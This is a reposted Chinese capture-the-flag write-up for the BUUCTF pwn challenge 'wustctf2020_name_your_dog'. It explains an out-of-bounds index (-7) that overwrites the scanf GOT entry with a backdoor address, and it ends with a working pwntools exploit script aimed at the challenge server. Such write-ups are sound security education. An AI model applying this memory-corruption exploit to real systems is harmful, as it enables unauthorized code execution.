[BUUCTF-pwn]——wustctf2020_name_your_dog
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——wustctf2020_name_your_dog
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——wustctf2020_name_your_dog
- 題目地址:https://buuoj.cn/challenges#wustctf2020_name_your_dog
checksec看下,
在IDA中看下, 竟然有后門函數,我們只需要執行該函數就好
看完代碼發現, 沒有什么可以溢出的地方. 唯一可以找到修改一些東西的只有, 這個函數, %7s雖然限定了長度但是足夠寫進去一個地址了.
看一下它的上一級, 調用發現Dogs在bss段距離got表很近, 意味著我們可以修改一個got表的地址然后, 下面只要有該函數的執行就好. 首先將目光發在了printf函數上
可是發現,printf距離Dogs的距離不是8 的倍數, 發現由于循環, __isoc99_scanf 函數也會執行. 碰巧距離剛好是8 的倍數-56 = 8 * (-7)
exploit
from pwn import * p = remote("node3.buuoj.cn",29805) #p = process("./wustctf2020_name_your_dog") shell = 0x080485CB p.sendlineafter(">",'-7') p.sendlineafter("Give your name plz: ",p32(shell))p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——wustctf2020_name_your_dog的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——[BJDCT
- 下一篇: [BUUCTF-pwn]——[ZJCTF